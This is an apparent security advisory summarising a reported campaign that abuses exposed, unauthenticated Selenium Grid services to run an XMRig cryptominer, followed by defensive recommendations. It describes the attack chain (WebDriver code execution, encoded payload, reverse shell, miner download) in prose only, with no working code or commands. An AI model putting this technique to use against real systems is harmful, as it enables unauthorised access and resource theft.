Ongoing Cyberattack Targets Exposed Selenium Grid Services for Crypto Mining

Summary:
Cybersecurity experts are warning about an ongoing campaign exploiting internet-exposed Selenium Grid services for unauthorized cryptocurrency mining. Wiz, a cloud security firm, is tracking this activity as SeleniumGreed, which has been targeting outdated Selenium versions (3.141.59 and earlier) since April 2023.

Wiz researchers Avigayil Mechtinger, Gili Tikochinski, and Dor Laska highlighted that the Selenium WebDriver API enables full machine interaction, including file manipulation and remote command execution. By default, this service lacks authentication, leaving many public instances misconfigured and open to abuse. Selenium Grid, part of the Selenium testing framework, allows parallel test execution across multiple environments. However, project maintainers emphasize that it must be protected from external access with appropriate firewall settings to prevent unauthorized actions.

The attackers behind this campaign target publicly exposed Selenium Grid instances, using the WebDriver API to run Python code that downloads and executes an XMRig miner. This process involves sending a request to a vulnerable Selenium Grid hub, executing a Base64-encoded payload to create a reverse shell, and fetching the final XMRig miner payload from an attacker-controlled server. The threat actor dynamically generates the miner's pool IP at runtime and configures the XMRig's TLS-fingerprint feature to communicate exclusively with their servers. The compromised IP address also hosts a publicly exposed Selenium Grid instance.


Security Officer Comments:
Wiz discovered over 30,000 instances vulnerable to remote command execution in newer Selenium versions, underscoring the urgency for users to rectify misconfigurations. Selenium Grid’s default lack of authentication poses a severe security risk, particularly when deployed on public IP machines without adequate firewall policies.


Suggested Corrections:

To protect your organization from this type of attack, consider taking the following steps:
  • Implement both an external network scanner and a vulnerability scanner to map exposure within your cloud environment.
  • Use runtime detection to address threats in real-time.
  • Apply network security controls, such as a firewall, to restrict network access:
    • Inbound: Allow only trusted IP ranges to access the service.
    • Outbound: Alllow outgoing traffic only to required endpoints.
  • Enable basic authentication to Selenium Grid instances. You can configure it by following this guide.

Link(s):
https://thehackernews.com/2024/07/ongoing-cyberattack-targets-exposed.html


https://www.wiz.io/blog/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps